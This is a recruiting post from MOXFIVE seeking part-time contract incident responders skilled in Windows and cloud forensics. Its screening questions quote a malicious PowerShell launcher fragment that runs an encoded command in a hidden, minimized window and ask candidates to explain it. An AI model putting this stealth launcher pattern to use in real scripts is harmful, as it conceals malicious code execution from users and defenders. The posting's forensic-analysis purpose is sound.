moxfive - Contract Bench, Incident Responder (DFIR)
Requirements
• You’re a “retired” incident responder who’s called it quits because you missed one too many holidays and had an exhausting on-call schedule. If you’re honest though, you miss the investigation. Finding actual evil and seeing the latest threat activity is more exciting than your day job, and you’d love to get your fix on some live response data without committing all your waking hours.
• You know that $I30 isn’t referring to your local interstate, and that the easiest way to get on your bad side is to be handed a timestamp that isn’t in UTC. You’ve got a “Tools” folder sitting on your workstation somewhere with your favorite forensic scripts at the ready to tear into the next piece of suspicious activity you see. And speaking of suspicious activity, you’ve honed a keen sense for knowing the difference between legitimate users and threat actor activity because you’ve seen them in action. Hundreds of times.
• Windows environment investigations feel like the back of your hand at this point, and you’ve been starting to expand your knowledge on cloud-native forensics. Account takeovers are the new malware after all, and investigating the latest threats across Azure, GCP, AWS, and SaaS Apps is the growing frontier you’ve been looking to sink your teeth into.
• You’re insatiably curious, addicted to threat intel, and an investigator at heart. Ultimately, you’d love an opportunity that allows you to get deeply technical and solve real cases at an intensity that’s compatible with your day job and everyday life.
• Experience responding to threat activity as an IR consultant or SOC analyst
• Strong understanding of Windows/Mac/Linux fundamentals, forensic artifacts, BEC analysis, and network analysis
• Existing knowledge or passion to learn cloud-native investigations across AWS, GCP, and Azure
• An unwavering emphasis on investigation at the highest level of quality
• Perspective and voice to continue to shape our practice
• At least a few free hours a week on your schedule to take on IR work. We’re day-job friendly (as long as your employer is cool with it).
• All official MOXFIVE communications will only come from an @moxfive.com email address.
Responsibilities
• Responding to threat activity as an IR consultant or SOC analyst.
• Strong understanding of Windows/Mac/Linux fundamentals and forensic artifacts.
• BEC analysis skills.
• Network analysis capabilities.
• Experience with cloud-native environments, including Azure, GCP, AWS, and SaaS Apps (passion to learn).
Benefits
• $80 – $100 per hour
• What’s your favorite forensic artifact and why?
• You find the following malicious PowerShell command during your investigation. What does it do? %COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand
• On a scale from “white and fluffy” to CloudTrail Creator, how would you rate your cloud-native forensics skills across AWS, GCP, and Azure Cloud?
• What’s your availability look like on an average week to take on live response analysis work?